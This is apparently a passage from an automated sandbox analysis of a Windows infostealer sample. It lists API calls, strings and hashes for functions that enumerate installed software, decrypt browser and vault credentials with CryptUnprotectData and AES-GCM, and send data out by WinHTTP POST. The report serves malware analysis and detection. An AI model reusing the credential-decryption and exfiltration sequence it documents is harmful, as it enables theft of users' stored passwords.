                                                                                                                                                    • String ID: !$%$%+$'435$($($,$/$/'($08?8$0?$0sU$1$13$3be06ec4609b38e474bb469adec52280 $4.&)$5?<$6$<$@$@~G$@~G$@~G$A$C$E$F$GET$H$I$K$K$O$POST$Q$Q$S$V\($\$\$^$^$_$_id$a$a$d$g$h$kmNrwOcalC/AE2CzI8a/C+QME+wvf7uEg+CHgDc3rjZMEle2EyYPXA== $l$s$t$tji$tmqp$w$yyN9gusA3iHFWGC6Lt/oAOYSGr5/Z7WEwqWEl2UwpXBMR1m5Rz1RH4ctP1c6cuD1xrg6Z1MDZrdHgDE5LOqKkU2BJRj+NFwuYOg77oZYnvleDBweiIlkPjDjMcZ2zQ44VlCbEBIC4PhnfYZhtzHy6yhR59nkcC2LQCiYnmnvmX+0r4z9KaefLkbMuVdS4RG78cobBmlxeRPukZHvewbBcQCCwgbmy/nwOaxETTkCgY35HIVkzL+ZoL+ehmoeqrim9QBH$z$}$~);<19,?3
                                                                                                                                                    • API String ID: 1935737536-86422518
                                                                                                                                                    • Opcode ID: 880d539dcd106f6789f32d41b33cb08de3eda59fb5a24ec61ed3f787473acd9b
                                                                                                                                                    • Instruction ID: d92c94f2cc2fd28d4a3d8de737a85a4888b6f53a69eac5e836953e9251696b64
                                                                                                                                                    • Opcode Fuzzy Hash: 880d539dcd106f6789f32d41b33cb08de3eda59fb5a24ec61ed3f787473acd9b
                                                                                                                                                    • Instruction Fuzzy Hash: 95E3AE30E092A89ADF24E765CC52BEDB7745F26304F4000DEA54977293EE782B89CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00434CB5, Relevance: 71.1, APIs: 37, Strings: 3, Instructions: 1113registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00434CBA
                                                                                                                                                      • Part of subcall function 00437CDD: __EH_prolog.LIBCMT ref: 00437CE2
                                                                                                                                                      • Part of subcall function 00434690: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 004346DC
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040), ref: 00434DAF
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00434DBC
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,00488E48,004374E1,00000000,00000012), ref: 00434DEB
                                                                                                                                                    • wsprintfW.USER32 ref: 00434E13
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00434E32
                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,00000000,000F003F,?,00000800,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00434EB0
                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,?,00488E48), ref: 00435062
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435148
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435167
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 0043516C
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435171
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435188
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,00488E48,004374E1,00000000,00000012), ref: 004351B6
                                                                                                                                                    • wsprintfW.USER32 ref: 004351DE
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 004351FD
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,000F003F,?,00000800,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 0043527B
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,?,00488E48), ref: 0043542D
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435513
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435532
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435537
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 0043553C
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000003,0047BCD8,00000000,00020019,?,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435556
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435566
                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00435590
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000001,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,00488E48,004374E1,00000000,00000012), ref: 004355D8
                                                                                                                                                    • wsprintfW.USER32 ref: 00435603
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435622
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,DECAE754,00000000,00000000,00000000,00000000,?,?,?,00488E48,004374E1,00000000,00000012,00000040), ref: 0043565E
                                                                                                                                                    • wsprintfW.USER32 ref: 0043568E
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,?,?,?,?,?,004374E1,00000000,00000012), ref: 004356AD
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,004374E1,00000000,00000012,00000040,00000001), ref: 004356BA
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,E5BFA9BE,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,004374E1,00000000), ref: 00435739
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,000F003F,?,00000800,00000000,00000000,?,?,?,?), ref: 004358F6
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,004374E1,00000000,00000012,00000040,00000001), ref: 004359D7
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435A00
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00488E48,004374E1,00000000,00000012,00000040,00000001), ref: 00435BE5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariable_strcatstd::ios_base::_
                                                                                                                                                    • String ID: %s\%s$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                    • API String ID: 2335028583-978129254
                                                                                                                                                    • Opcode ID: b8bc7bd9b9ded84ad61cc5a23d152f1af54d51886b6747ca02400d426e156dad
                                                                                                                                                    • Instruction ID: 854981e76c2d1f81e5c6eb2a8baca6fd599123b4a21116ed219c60dcb9ab44d6
                                                                                                                                                    • Opcode Fuzzy Hash: b8bc7bd9b9ded84ad61cc5a23d152f1af54d51886b6747ca02400d426e156dad
                                                                                                                                                    • Instruction Fuzzy Hash: 8DA2F370D0025D9FDF21DFA5CC80BEEBBB9AF19304F2051AAE459B7241DB740A89CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004322AF, Relevance: 67.1, APIs: 34, Strings: 4, Instructions: 569filestringmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004322B4
                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00432559
                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004325D8
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000010,?,00000000), ref: 004325EB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004325F2
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00432606
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00432615
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000800), ref: 00432626
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0043262D
                                                                                                                                                    • lstrlenA.KERNEL32 ref: 00432644
                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000001), ref: 00432659
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00432666
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001), ref: 00432675
                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0043268C
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004326A2
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001), ref: 004326B5
                                                                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 004326C6
                                                                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 004326E7
                                                                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000005,000F4240,00000004), ref: 004326F2
                                                                                                                                                    • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?), ref: 00432785
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00800100,?), ref: 00432875
                                                                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000100,?), ref: 004328E3
                                                                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,00000000,000000FF,00000008,?,?,00000000,?), ref: 00432953
                                                                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 0043297B
                                                                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00432991
                                                                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 004329C6
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000,00000002,00000080), ref: 00437734
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000), ref: 0043777B
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00432A75
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00432A7F
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00432A88
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00432A91
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00432A98
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 00432AA2
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00432AA9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Http$File$CloseHandle$Heap$OptionRequestlstrcpynlstrlen$ByteCharCreateDataDeleteMultiOpenProcessReadWide$AllocAvailableConnectDeallocateFreeH_prologQueryReceiveResponseSendSizeWrite
                                                                                                                                                    • String ID: %[^:]://%[^/]%[^]$0sU$POST$https
                                                                                                                                                    • API String ID: 2264578430-4212080555
                                                                                                                                                    • Opcode ID: f8b639da5f18781267428270ab701b7ced6ec659195f14ff993bbb386eac36bd
                                                                                                                                                    • Instruction ID: 94f8ccf564f1702ae002e3590acb76701a22e319306006e13964585108649d05
                                                                                                                                                    • Opcode Fuzzy Hash: f8b639da5f18781267428270ab701b7ced6ec659195f14ff993bbb386eac36bd
                                                                                                                                                    • Instruction Fuzzy Hash: FB329C70D00258ABDB21DFA4CD95AEEBBB4FF59304F0041AEE449A7211EB785E84CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00427AAA, Relevance: 58.2, APIs: 28, Strings: 5, Instructions: 434stringlibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00427AF2
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00427B46
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00427B93
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00427BCF
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00427C0F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00427C4A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00427C86
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00427CBF
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00427D82
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 00427D9D
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00427DAA
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 00427DC9
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00427DD6
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 00427DFA
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00427E2E
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 00427E4F
                                                                                                                                                    • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00427F66
                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 00427F71
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00427F81
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0042800F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
                                                                                                                                                    • String ID: vAULTgETiTEM$#uBVOWeQFF$E3$0)1&),k!))$Internet Explorer$udlr
                                                                                                                                                    • API String ID: 4222390991-2509685321
                                                                                                                                                    • Opcode ID: ef4b27b013203956ceb388004dd85d947fd15598db213c9c49783322f4ef335c
                                                                                                                                                    • Instruction ID: 71b5d20162fc281f74aa38e75deb410a99a999b677eb62c1e1ac214ee544ca41
                                                                                                                                                    • Opcode Fuzzy Hash: ef4b27b013203956ceb388004dd85d947fd15598db213c9c49783322f4ef335c
                                                                                                                                                    • Instruction Fuzzy Hash: DDF18E71E04268AFDF14DFA8EC48BEEBBB8EF49304F14406AE405E7212D7749985CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E727, Relevance: 55.4, APIs: 13, Strings: 18, Instructions: 1119libraryloaderencryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040E72C
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E772
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E7A2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E7EE
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E824
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E857
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E88A
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E8B9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E8F9
                                                                                                                                                    • wsprintfA.USER32 ref: 0040E972
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                      • Part of subcall function 0043426F: __EH_prolog.LIBCMT ref: 00434274
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F207
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?), ref: 0040F272
                                                                                                                                                      • Part of subcall function 0040CB54: __EH_prolog.LIBCMT ref: 0040CB59
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040CBC2
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040CBE0
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040CC01
                                                                                                                                                      • Part of subcall function 0040CB54: LocalAlloc.KERNEL32(00000040,?), ref: 0040CC52
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040CC7A
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F2F7
                                                                                                                                                      • Part of subcall function 0040DC35: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040DC63
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Crypt$H_prolog$DataDeallocateLocalUnprotect$AlgorithmAllocDecryptFreeGenerateIos_base_dtorOpenPropertyProviderSymmetricstd::ios_base::_wsprintf
                                                                                                                                                    • String ID: 0sU$1,=k$360Browser$Opera$RD$UCBrowser$V$W[[_$X+)4$XX\^$`&!,3%$dM$id([$m9?8($r& '7$uhy/$xz$|i|m
                                                                                                                                                    • API String ID: 535477421-3597370198
                                                                                                                                                    • Opcode ID: e79df7de9c8f9b167b70beb2a8123fddf203a1747b8d21bb8af4dc27bbbe234c
                                                                                                                                                    • Instruction ID: bc7bb35ff8ea35e2b2896074568407a2619d62ba6b09fe79efea23a6b443efe2
                                                                                                                                                    • Opcode Fuzzy Hash: e79df7de9c8f9b167b70beb2a8123fddf203a1747b8d21bb8af4dc27bbbe234c
                                                                                                                                                    • Instruction Fuzzy Hash: 92A2BB30904258CBDF21DFA5CC54BEEBBB0AF59304F1045AEE409B7292EB745A89CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F78B, Relevance: 44.6, APIs: 14, Strings: 11, Instructions: 844libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040F790
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F7DC
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F80C
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F849
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F87F
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F8B2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F8E5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F914
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040F954
                                                                                                                                                    • wsprintfA.USER32 ref: 0040F9CE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$H_prologwsprintf
                                                                                                                                                    • String ID: y{fc~o9Uifeyo$(~G$-0$360Browser$=NLQ$JWU8$Opera$UCBrowser$`u`q$m}8^$ux4G
                                                                                                                                                    • API String ID: 3606448584-3002580714
                                                                                                                                                    • Opcode ID: 0defc667bfa01788162ae83c827a50316ffcc47425965b74020790038cf7ce72
                                                                                                                                                    • Instruction ID: 4976ad4aca65ce455ea9c06a35c021bf5c2a39274fc18c5ea59ff629af00a9d0
                                                                                                                                                    • Opcode Fuzzy Hash: 0defc667bfa01788162ae83c827a50316ffcc47425965b74020790038cf7ce72
                                                                                                                                                    • Instruction Fuzzy Hash: D672AD30904258DBDF21DFA4CD91AEEBBB4AF19304F1040AEE409B7252DB785BC9CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DC7B, Relevance: 35.7, APIs: 11, Strings: 9, Instructions: 729libraryloaderencryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040DC80
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040DCC9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040DCF9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040DD36
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040DD70
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040DDA3
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040DDD2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040DE12
                                                                                                                                                      • Part of subcall function 0041206E: __EH_prolog.LIBCMT ref: 00412073
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    • wsprintfA.USER32 ref: 0040DE8C
                                                                                                                                                      • Part of subcall function 00434690: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 004346DC
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                      • Part of subcall function 0043426F: __EH_prolog.LIBCMT ref: 00434274
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?), ref: 0040E542
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E4DF
                                                                                                                                                      • Part of subcall function 0040CB54: __EH_prolog.LIBCMT ref: 0040CB59
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040CBC2
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040CBE0
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040CC01
                                                                                                                                                      • Part of subcall function 0040CB54: LocalAlloc.KERNEL32(00000040,?), ref: 0040CC52
                                                                                                                                                      • Part of subcall function 0040CB54: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040CC7A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CryptH_prolog$DeallocateLocal$AlgorithmAllocDataDecryptEnvironmentFreeGenerateOpenPropertyProviderSymmetricUnprotectVariable_strcatwsprintf
                                                                                                                                                    • String ID: "7"3$&;*|$(~G$+$+XZG$Ha%$O<>#$Opera$tHGD
                                                                                                                                                    • API String ID: 3336088669-3303896906
                                                                                                                                                    • Opcode ID: 25a2351561f4af50298e22c30c260bb566e22c07c4d3d3b7529ecc4820172303
                                                                                                                                                    • Instruction ID: 05d61b58d22e72f894452e26ec314a98de2e1e68cc553078f2623dfd4ab7e5e7
                                                                                                                                                    • Opcode Fuzzy Hash: 25a2351561f4af50298e22c30c260bb566e22c07c4d3d3b7529ecc4820172303
                                                                                                                                                    • Instruction Fuzzy Hash: CE629D30D002589BDF15EFA5CD91AEDBBB4AF18304F0044AEE419B7291EB785B89CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D560, Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 492libraryloaderencryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040D565
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040D5AE
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040D5DE
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040D61B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040D655
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040D688
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040D6B7
                                                                                                                                                    • GetProcAddress.KERNEL32(?,514C4E3D), ref: 0040D6F7
                                                                                                                                                      • Part of subcall function 0041206E: __EH_prolog.LIBCMT ref: 00412073
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    • wsprintfA.USER32 ref: 0040D75B
                                                                                                                                                      • Part of subcall function 00434690: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 004346DC
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040D9BB
                                                                                                                                                      • Part of subcall function 00413E2A: __EH_prolog.LIBCMT ref: 00413E2F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$H_prolog$Deallocate$CryptDataEnvironmentUnprotectVariable_strcatwsprintf
                                                                                                                                                    • String ID: $!$(~G$,bya$E64)=NLQ$EDS;$m(5=WM
                                                                                                                                                    • API String ID: 3159670169-3215056505
                                                                                                                                                    • Opcode ID: dd88f4883d712366843afd6a1efaccc1a80f2cd5c5031dd4395b0bd482a2ef1b
                                                                                                                                                    • Instruction ID: e49575c91d11e8e557f71449dd472241c58867fece031872b28838f592ad77ca
                                                                                                                                                    • Opcode Fuzzy Hash: dd88f4883d712366843afd6a1efaccc1a80f2cd5c5031dd4395b0bd482a2ef1b
                                                                                                                                                    • Instruction Fuzzy Hash: 4F12F330D04248CFDF01DFA8D8506EEBBB1AF59304F1084AEE845B7252EB785B89CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042770E, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 169encryptionstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 00427733
                                                                                                                                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 00427754
